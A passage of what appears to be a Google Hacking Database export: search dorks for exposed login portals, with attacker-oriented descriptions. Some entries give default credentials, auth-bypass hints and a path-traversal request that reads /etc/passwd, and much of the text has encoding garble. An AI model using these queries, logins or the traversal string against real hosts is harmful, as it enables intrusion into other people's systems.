VNC can be important to an attacker, as is the open port of 5800."}, {"dork": "intitle:Remote.Desktop.Web.Connection inurl:tsweb", "description": "This is the login page for Microsoft's Remote Desktop Web Connection, which allows remote users to connect to (and optionally control) a user's desktop. Although authentication is built into this product, it is still possible to run this service without authentication. Regardless, this search serves as a footprinting mechanisms for an attacker."}, {"dork": "inurl:names.nsf?opendatabase", "description": "A Login portal for Lotus Domino servers. Attackers can attack this page or use it to gather information about the server."}, {"dork": "inurl:/Citrix/Nfuse17/", "description": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site."}, {"dork": "intitle:\"eMule *\" intitle:\"- Web Control Panel\" intext:\"Web Control Panel\" \"Enter your password here.\"", "description": "This iks the login page for eMule, the p2p file-sharing program. These pages forego the login name, prompting only for a password. Attackers can use this to profile a target, gather information and ultimately upload or download files from the target (which is a function of the emule program itself)"}, {"dork": "inurl:login filetype:swf swf", "description": "This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file."}, {"dork": "\"please log in\"", "description": "This is a simple search for a login page. Attackers view login pages as the \"front door\" to a site, but the information about where this page is stored and how it is presented can provide clues about breaking into a site."}, {"dork": "inurl:/eprise/", "description": "silkRoad Eprise is a dynamic content management product that simplifies the flow of content to a corporate website. The software requires NT 4, Windows 2000 or Solaris and is used by high-profile corporations. If an attacker cuts the url after the eprise/ directory, he is presented with the admin logon screen."}, {"dork": "inurl:search/admin.php", "description": "phpMySearch is a personal search engine that one can use to provide a search feature for one's own Web site. With this search an attacker can find admin logon screens. This software does not seem to be very popular yet, but would allow attackers to access indexed information about the host if compromised."}, {"dork": "filetype:r2w r2w", "description": "WRQ Reflection gives you a standard desktop that includes web- and Windows-based terminal emulation and X Windows products. Terminal emulation settings are saved to a configuration file, depending on the version called r1w, r2w, or r4w. If an attacker loads these files he can access the main login screen on mainframe systems for example."}, {"dork": "intitle:\"Welcome Site/User Administrator\" \"Please select the language\" -demos", "description": "service providers worldwide use Ensim's products to automate the management of their hosting services. Currently it hosts more than 500,000 Web sites and five million mailboxes.Ensim's uses a control panel GUI to manage the servers. It has four levels of priviledges. The software runs on TCP port 19638, but access is normally limited to trusted hosts only. A local exploit was found by badc0ded.org in virthostmail, part of Ensim WEBppliance Pro."}, {"dork": "\"ttawlogin.cgi/?action=\"", "description": "Tarantella is a family of enterprise-class secure remote access software products. This Google-dork lists the login page for remote access to either the site server or another server within the target company. Tarantella also has a few security issues for a list of possible things that a malicous user could try to do, have a look at - http://www.tarantella.com/security/index.html An example of a malicous user could try is http://www.tarantella.com/security/bulletin-03.html the exploit isn't included in the User-Notice, but I've worked it out to be something like install directory/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"}, {"dork": "inurl:\"exchange/logon.asp\" OR intitle:\"Microsoft Outlook Web Access - Logon\"", "description": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad."}, {"dork": "filetype:cgi inurl:\"irc.cgi\" | intitle:\"CGI:IRC Login\"", "description": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else."}, {"dork": "filetype:php login (intitle:phpWebMail|WebMail)", "description": "PhpWebMail is a php webmail system that supports imap or pop3. It has been reported that PHPwebmail 2.3 is vulnerable. The vulnerability allows phpwebmail users to gain access to arbitrary file system by changing the parameters in the URL used for sending mail (send_mail.php). More info at http://eagle.kecapi.com/sec/fd/phpwebmail.html."}, {"dork": "+\"Powered by INDEXU\" inurl:(browse|top_rated|power", "description": "From the sales department: \"INDEXU is a portal solution software that allows you to build powerful Web Indexing Sites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to allow you and your members to easily add, organize, and manage your links makes INDEXU the first choice of all webmasters.\"(Moderator note: don't believe the marketing talk..)Some of these servers are not protected well enough. It has been reported that on (rare) occosions this page ->http://[indexu server]/recovery_tools/create_admin_user.phpindicates admin login is possible by the appearance of three text lines:Create Administrator LoginDelete old administrator user ....okCreate new administrator user ....okAn attacker can then change the URL tohttp://[target]/admin/index.php and enter:user=adminpass=adminBut that's if you find them.."}, {"dork": "ASP.login_aspx \"ASP.NET_SessionId\"", "description": ".NET based login pages serving the whole environment and process trace for your viewing pleasure.. These are often found on test servers, just before going online to the general public I guess. If the current page has no debugging information any longer, an attacker could still look at Google's cached version."}, {"dork": "inurl:\"utilities/TreeView.asp\"", "description": "From the marketing brochure: \"UltiPro Workforce Management offers you the most comprehensive and cost-effective HR and payroll solution on the market today.\"The default passwords are easy to guess if an employee has not logged into this system. An attacker would only need to find the loginname."}, {"dork": "intitle:Node.List Win32.Version.3.11", "description": "synchronet Bulletin Board System Software is a free software package that can turn your personal computer into your own custom online service supporting multiple simultaneous users with hierarchical message and file areas, multi-user chat, and the ever-popular BBS door games.An attacker could use this search to find hosts with telnet access. In some cases the username may even be visible on the node list page, thus leaving only the password to guess."}, {"dork": "(inurl:\"ars/cgi-bin/arweb?O=0\" | inurl:arweb.jsp)", "description": "From the vendor site: \"Remedy\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s Action Request System\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is for automating Service Management business processes. More than 7,000 customers know that AR System is the way to automate key business processes. AR System includes tools for application-to-application integration, including support for Web Services that requires no additional programming.\"Login is often 'guest' with no password. Or no login is required. An attacker can search the database for sensitive info (passwords), and search profiles to obtain usernames, emails."}, {"dork": "intitle:\"teamspeak server-administration", "description": "TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal."}, {"dork": "\"WebSTAR Mail - Please Log In\"", "description": "@stake, Inc. advisory: \"4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X. There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources.\"See also: http://www.securityfocus.com/archive/1/368778"}, {"dork": "inurl:cgi-bin/ultimatebb.cgi?ubb=login", "description": "These are login pages for Infopop's message board UBB.classic. For the UBB.threads you can use this search This next search finds all UBB pages with the infopop image and a link to the developers.http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1"}, {"dork": "\"powered by CuteNews\" \"2003..2005 CutePHP\"", "description": "This finds sites powered by various CuteNews versions. An attacker use this list and search the online advisories for vulnerabilities. For example: \"CuteNews HTML Injection Vulnerability Via Commentaries\", Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)"}, {"dork": "Novell NetWare intext:\"netware management portal version\"", "description": "Netware servers ( v5 and up ) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.After the Google results are displayed, an attacker wil go to the company base web url and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password."}, {"dork": "Login (\"Powered by Jetbox One CMS \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2\" | \"Powered by Jetstream \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 *\")", "description": "Jetbox is a content management systems (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF wich I think is overrated, but I will mention here:http://www.securityfocus.com/bid/10858/discussion/The file holding the password is called: \"http://.../includes/general_settings.inc.php\"It does come with default passwords and that is allways a security risk. The administration is available via /admin/Username: admin, Password: admin1 ."}, {"dork": "intitle:Login * Webmailer", "description": "1&1 Webmail login portals. This is made by a german company called Internet United active in the hosting providers area. They have a server login product wich can be found by GooglingThis is all not very exiting as there have been no vulnerabilities reported on this software yet."}, {"dork": "inurl:\"gs/adminlogin.aspx\"", "description": "GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example: option value=\"E:\\GRADESPEED\\DRHARMONWKELLEYELEMENTARY\\|Dr H. W K. E.|101\">Dr ..."}, {"dork": "\"4images Administration Control Panel\"", "description": "4images Gallery - 4images is a web-based image gallery management system. The 4images administration control panel let you easily modify your galleries."}, {"dork": "intitle:\"TUTOS Login\"", "description": "TUTOS stands for \"The Ultimate Team Organization Software.\" This search finds the login portals to TUTOS.Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. It is said that with the username linus and the password guest you can see what it looks like when your logged in. This is unconfirmed as of now."}, {"dork": "\"Login to Usermin\" inurl:20000", "description": "Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators."}, {"dork": "intitle:\"Login - powered by Easy File Sharing Web", "description": "Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.)\". More information at: http://www.securityfocus.com/bid/11034/discussion/An attacker can reportedly bypass the authentication by entering the the name of the virtual folder directly."}, {"dork": "intitle:\"Tomcat Server Administration\"", "description": "This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server."}, {"dork": "Admin intitle:\"eZ publish administration\"", "description": "Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.Vendor site: http://www.ez.no/Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodifiedDepending on the version two queries can usedAdmin intitle:\"eZ publish administration\"intitle:\"Login\" \"Welcome to eZ publish administration\"Crosssite Scriting, Information Disclosure, Pathdisclosure available on older versions"}, {"dork": "inurl:administrator \"welcome to mambo\"", "description": "Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications. Continue reading for a detailed feature list.Vendor: http://www.mamboserver.com/Cross Site Scripting and SQL injection exist in some versions 4.5 current version is 4.5.1RC3 Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&sbm=bid&submit=Search%21&metaname=alldoc"}, {"dork": "inurl:\"typo3/index.php?u=\" -demo", "description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.Vendor: http://www.typo3.com/Vulns: http://search.securityfocus.com/swsearch?query=Typo3&sbm=bid&submit=Search%21&metaname=alldoc"}, {"dork": "uploadpics.php?did= -forum", "description": "What is W-Nailer?W-Nailer is a PHP script which can create galleries for you.It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely webbased.So after you have uploaded your files, you will just need your browser!"}, {"dork": "inurl:mewebmail", "description": "MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions.This search is a portal search. If finds the logins screens. If a vulnerability is found, this search becomes the target base for an attacker."}, {"dork": "intitle:\"microsoft certificate services\" inurl:certsrv", "description": "Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as \"proof\" that someone or something is what they claim they are. The Microsoft certificates are meant to be used with IIS for example with Outlook Web Access. The users of these certificates have to decide if they trust it or not. If they do, they can import a root certificate into their browsers (IE).Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet. Which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such."}, {"dork": "intitle:\"oMail-admin Administration - Login\" -inurl:omnis.ch", "description": "oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features includes multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support."}, {"dork": "intitle:\"MailMan Login\"", "description": "MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation. MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'."}, {"dork": "inurl:default.asp intitle:\"WebCommander\"", "description": "Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings."}, {"dork": "intitle:\"Philex 0.2*\" -script -site:freelists.org", "description": "Philex (phile 'file' explorer) is a web content manager based php what philex can do ? - easy navigation with tree structure - create, delete, rename, copy and move folders/files. - download files (normal or compressed :zip, gz, bz ). - download many files as one compressed file. - send files by email. - upload local files to server"}, {"dork": "\"WebExplorer Server - Login\" \"Welcome to WebExplorer Server\"", "description": "WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people."}, {"dork": "intitle:\"remote assessment\" OpenAanval Console", "description": "The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management."}, {"dork": "\"IMail Server Web Messaging\" intitle:login", "description": "IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft Exchange\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae or groupware which challenges even the most experienced administrators.This is a login portal search. Security Focus shows a list of vulnerabilities about this software."}, {"dork": "inurl:\"calendar.asp?action=login\"", "description": "aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail. You can check it here: http://www.securityfocus.com/bid/11246Searches for aspWebAlbum and aspWebHeadlines:inurl:\"album.asp?action=login\"inurl:\"news.asp?action=login\""}, {"dork": "inurl:confixx inurl:login|anmeldung", "description": "Confixx is a webhosting management tool and has the following features: * create resellers, * edit personal data, * manage newsletters to resellers, * comprehensive stats, * powerful evaluation of traffic, * manage e-mail templates, * lock resellers. security focus has a vulnerability report on this.vendor: http://www.sw-soft.com/en/products/confixx/"}, {"dork": "\"VHCS Pro ver\" -demo", "description": "VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.No vulnerabilities are reported to security focus."}, {"dork": "\"SysCP - login\"", "description": "sysCP: Open Source server management tool for Debian LinuxNo vulnerabilities are reported to security focus."}, {"dork": "intitle:\"ISPMan : Unauthorized Access prohibited\"", "description": "ISPMan is a distributed system to manage components of ISP from a central management interface.No vulnerabilities are reported to security focus."}, {"dork": "\"Login - Sun Cobalt RaQ\"", "description": "The famous Sun linux appliance. Nice clean portal search.Various vulnerabilities are reported to security focus."}, {"dork": "intitle:plesk inurl:login.php3", "description": "Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus."}, {"dork": "inurl:/dana-na/auth/welcome.html", "description": "Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.advisories: http://secunia.com/product/1558/http://www.securityfocus.com/bid/7510"}, {"dork": "inurl:login.php \"SquirrelMail version\"", "description": "squirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation."}, {"dork": "intitle:\"php icalendar administration\" -site:sourceforge.net", "description": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.This reveals the administration interface."}, {"dork": "intitle:\"php icalendar administration\" -site:sourceforge.net", "description": "This is the adminstration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin uuthentication has two choices, FTP and Internal. For the latter the defaults are \"admin/admin\".There is also a more generic search in the GHDB that an attacker use and then modify to ../admin.php to reach the adminstration pages. Access to adminstration allows an attacker to upload new ICS files or delete present ones."}, {"dork": "inurl:irc filetype:cgi cgi:irc", "description": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else."}, {"dork": "intext:\"Icecast Administration Admin Page\" intitle:\"Icecast Administration Admin Page\"", "description": "Icecast streaming audio server web admin.This gives you a list of connected clients. Interesting way of finding attackable client computers."}, {"dork": "inurl:coranto.cgi intitle:Login (Authorized Users Only)", "description": "Coranto is one of the most powerful Content Management System (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site, it supports multiple browsers, multiple operating systems, produces standard compliant html, has a huge variety of excellent features and is fully extendible via addons. It is free for use on any site, personal or commercial!"}, {"dork": "intitle:\"PHP Advanced Transfer\" inurl:\"login.php\"", "description": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download & upload manager\". This is a search for the login pages."}, {"dork": "intext:\"Storage Management Server for\" intitle:\"Server Administration\"", "description": "These pages can reveal information about the operating system and patch level, as well as providing a login portal for hackers to attack. \"As part of the IBM TotalStorage\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae Open Software Family, IBM Tivoli Storage (ADSM) Manager protects your organization's data from hardware failures and other errors by storing backup and archive copies of data on offline storage.\""}, {"dork": "intitle:\"VitalQIP IP Management System\"", "description": "The VitalQIP Web Client Interface provides a World Wide Web interface for the VitalQIP IP Management software. The purpose of the VitalQIP Web Client Interface is to allow users to add, modify, and delete IP addresses; create configuration and data files; and generate reports. It is not a fully functional user interface, such as the VitalQIP Windows or VitalQIP UNIX Clients. Certain options, such as infrastructure or policy management, are not provided. The VitalQIP Web Client Interface software is based on HTML and Perl, so your organization can customize it to meet your requirements. Vendors site: http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html"}, {"dork": "intitle:\"vhost\" intext:\"vHost . 2000-2004\"", "description": "vHost is a one-step solution for all virtual hosting needs. It enables a Linux/BSD server with single or multiple IP addresses to function as unlimited virtual hosts with HTTP, FTP, SMTP, POP3, IMAP, and other virtual services extentable via modules. It comes with both command-line and web-based graphical user interfaces, which give maximum control to a domain's owner, while relieving the system administrator of most routine administration tasks."}, {"dork": "inurl:\"1220/parse_xml.cgi?\"", "description": "Quicktime streaming server is uhhhhh.....well it's a streaming server and it can be managed via http. No need to say more. Darwin Streaming Server is the opensource version (for *NUX os's).Some are pass protected, others not."}, {"dork": "intitle:\"MX Control Console\" \"If you can't remember\"", "description": "MX Logic\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s customizable and easy-to-use MX Control ConsoleSM is a centralized email threat management policy platform that provides you with one interface for managing all corporate-wide email threats, protection and security. With the MX Control Console, you can easily configure and control your email protection and security based on your overall corporate email policies."}, {"dork": "intitle:\"WebLogic Server\" intitle:\"Console Login\" inurl:console", "description": "BEA WebLogic Server 8.1 provides an industrial-strength application infrastructure for developing, integrating, securing, and managing distributed service-oriented applications. By simplifying and unifying the enterprise infrastructure, IT organizations can now deliver greater value in less time, at reduced cost to the overall business."}, {"dork": "inurl:1810 \"Oracle Enterprise Manager\"", "description": "Enterprise Manager 10g Grid Control provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. Grid Control is also extensible via an SDK so customers can use it to monitor additional components that are not supported out-of-the box."}, {"dork": "intitle:\"Novell Web Services\" intext:\"Select a service and a language.\"", "description": "\"Novell\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae GroupWise is an enterprise collaboration system that provides secure e-mail, calendaring, scheduling, and instant messaging. GroupWise also includes task management, contact management, document management, and other productivity tools. GroupWise can be used on your desktop on Linux, Windows*, or Macintosh; in a Web browser anywhere you have an Internet connection; and even on wireless devices. Your GroupWise system can be set up on NetWare\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, Linux, Windows, or any combination of these operating systems.\""}, {"dork": "intitle:\"Athens Authentication Point\"", "description": "Athens is an Access Management system for controlling access to web based subscription services. It offers: * secure single username access to multiple web-based access controlled services * devolved administration facilities at organisation level * remote access user accounts * encrypted account bulk upload facilities * scalable services with 3 million accounts * replication facilities at several separate physical locations, offering a resilient authentication service"}, {"dork": "intitle:Login intext:\"RT is \u00a9 Copyright\"", "description": "RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.Versions including 2.0.13 are vulnerable to injection, check outSecurityFocus BID 7509"}, {"dork": "intext:\"\"BiTBOARD v2.0\" BiTSHiFTERS Bulletin Board\"", "description": "The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database. The password file can be retrieve from/admin/data_passwd.dat"}, {"dork": "\"pcANYWHERE EXPRESS Java Client\"", "description": "This search will reveal the java script program that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web."}, {"dork": "inurl:\"Activex/default.htm\" \"Demo\"", "description": "This search will reveal the active X plugin page that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web."}, {"dork": "intitle:\"VNC viewer for Java\"", "description": "VNC (Virtual Network Computing) allows a pc to be controlled remotely over the Internet. These are the password protected but still shouldn't be allowed to be indexed by Google by accident."}, {"dork": "intitle:\"PHPhotoalbum - Upload\" | inurl:\"PHPhotoalbum/upload\"", "description": "Homepage: http://www.stoverud.com/PHPhotoalbum/PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums."}, {"dork": "inurl:PHPhotoalbum/statistics intitle:\"PHPhotoalbum - Statistics\"", "description": "PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums."}, {"dork": "-Login inurl:photopost/uploadphoto.php", "description": "PhotoPost was designed to help you give your users exactly what they want. Your users will be thrilled to finally be able to upload and display their photos for your entire community to view and discuss, all with no more effort than it takes to post a text message to a forum.Over 3,500 web sites are powered by PhotoPost today. These customers trusted our software to simplify their lives as webmasters, and to meet the needs of their users."}, {"dork": "inurl:\"usysinfo?login=true\"", "description": "Dell OpenManage enables remote execution of tasks such as system configuration, imaging, application installation and support. It also used to track hardware and software inventory, to update configurations, drivers, OS and applications and to proactively monitor and correct fault conditionsDell OpenManage standards include the Common Information Model (CIM), Desktop Management Interface (DMI), Simple Network Management Protocol (SNMP), and Wired for Management (WfM).Another possible search for this is:\"Log in.\" inurl:1311/servlet/"}, {"dork": "intitle:\"ePowerSwitch Login\"", "description": "With ePowerSwitch D4 Guard, up to four devices can be individually switched on and off, also with programmed switching states. The activated Guard function ensures exceptionally high equipment availability: continually monitors whether the connected IP-based devices are still active, it can automatically, without user input, reboot any crashed device."}, {"dork": "inurl:orasso.wwsso_app_admin.ls_login", "description": "Oracle provides a Single Sign-On solution which is quite widely spread as it integrates quite seemlessly into exisitng appllications (as Oracle says).If the link itself shows an empty page, try the directory below."}, {"dork": "\"Microsoft CRM : Unsupported Browser Version\"", "description": "Microsoft CRM Login portal.MS says:Microsoft CRM integrates with Microsoft Office, Microsoft Business Solutions for Financial Management, and other business systems to give employees a complete view of customer information. The ease of integration with Microsoft Office is of particular value\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009denabling staff to access Microsoft CRM information from Microsoft Office Outlook and work online or offline with access to sales functionality."}, {"dork": "inurl:WCP_USER", "description": "WebConnect is client-server based software that provides secure browser based emulation to mainframe, midrange and UNIX systems"}, {"dork": "allinurl:wps/portal/ login", "description": "Login to IBM WebSphere Portal.You may find portals using standard administrator user/password which gave you complete access to the application itself."}, {"dork": "\"Powered by UebiMiau\" -site:sourceforge.net", "description": "UebiMiau is a simple, yet efficient cross-plataform POP3/IMAP mail reader written in PHP. It's have some many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit"}, {"dork": "intitle:\"VMware Management Interface:\" inurl:\"vmware/en/\"", "description": "VMware GSX Server is enterprise-class virtual infrastructure software for x86-based servers. It is ideal for server consolidation, disaster recovery and streamlining software development processes."}, {"dork": "inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0", "description": "eHealth, a network management solution, enables its users to manage performance and availability of LANs, WANs, routers, Switches, Frame Relay, ATM, Remote Access Equipment, QoS, Wireless LAN, DAL, Voice and Cable technologies."}, {"dork": "intitle:endymion.sak\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9.mail.login.page | inurl:sake.servlet", "description": "sak\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9 Mail, servlet-based web email system, designed for scaling to large numbers of concurrent users. Intended for large universities or enterprise-level mail system"}, {"dork": "intitle:ilohamail \"Powered by IlohaMail\"", "description": "IlohaMail is a light-weight yet feature rich multilingual webmail system designed for ease of use, written in pure PHP. It supports web-access to IMAP and POP3 accounts, and includes a complete contacts feature and other PIM features."}, {"dork": "intitle:\"Zope Help System\" inurl:HelpSys", "description": "By itself, this returns Zope's help pages. Manipulation of the URL, changing 'HelpSys' to 'manage', gives a link to a server's Zope Management Interface. While this requires authentication, sometimes overly revealing error messages are returned."}, {"dork": "intitle:\"SFXAdmin - sfx_global\" | intitle:\"SFXAdmin - sfx_local\" | intitle:\"SFXAdmin - sfx_test\"", "description": "Just another logon page search, this one is for SFX\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, a link server from Ex Libris, delivers linking services in the scholarly information environment. SFX is also a component in the management of electronic resources in a library."}, {"dork": "\"Powered by DWMail\" password intitle:dwmail", "description": "What is DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2?: DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 is an 'intelligent' Web based email application written in the scripting language, PHP. DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 allows you and your visitors to access, manage and send email using any POP3 or IMAP4 compliant email account. Simply enter your email address and password to check your email."}, {"dork": "inurl:gnatsweb.pl", "description": "GNU GNATS is a set of tools for tracking bugs reported by users to a central site. It allows problem report management and communication with users via various means. GNATS stores all the information about problem reports in its databases and provides tools for querying, editing, and maintenance of the databases."}, {"dork": "intitle:open-xchange inurl:login.pl", "description": "Open-Xchange 5 is a high performance substitute for costly and inflexible Microsoft Exchange deployments -- with the full functionality of a mature collaboration platform. OX 5 will not only manage appointments and tasks, it will take care of email, calendar, contacts, to do's, projects, documents, search and forums. With OX, you can manage information using bookmarks that are linked to a wide variety of data objects, such as emails, spreadsheets and/or presentations. Open-XchangeT 5 allows you to connect to Microsoft Outlook and devices using the Palm OS. Based on proven open source technologies, OX 5 offers best-of-class security through anti-virus and anti-spam utilities."}, {"dork": "intitle:\"VisNetic WebMail\" inurl:\"/mail/\"", "description": "VisNetic WebMail is a built-in web mail server that allows VisNetic Mail Server account holders to access their email messages, folders and address books from any standard web browser on an Internet enabled computer."}, {"dork": "allintitle:\"Welcome to the Cyclades\"", "description": "This search reveals the login page for the Cyclades TS1000 and TS2000 Web Management Service. The Cyclades TS1000 and TS200 devices are Console servers, based on a cut down Linux version. These lovely devices sit on the network with console cables attached to them, so that you then gain access to this device, and then have console access to any of the hosts connected to the console ports. :-)The default username and password for these devices is, root/tslinux.This query currently only returns pages available in Google's cache (but in the future more devices may be returned)."}, {"dork": "intitle:\"XcAuctionLite\" | \"DRIVEN BY XCENT\" Lite inurl:admin", "description": "This query reveals login pages for the administration of XcAuction and XcClassified Lite..\"XcAuction is a powerful and complete auction package that allows you to add auction capabilities to any web site.\"\"XcClassified allows you to offer free or fee based classified ads to your site visitors. It integrates easily into your existing web site design and offers many features.\""}, {"dork": "intitle:\"XMail Web Administration Interface\" intext:Login intext:password", "description": "This search will find the Web Administration Interface for servers running XMail.\"XMail is an Internet and intranet mail server featuring an 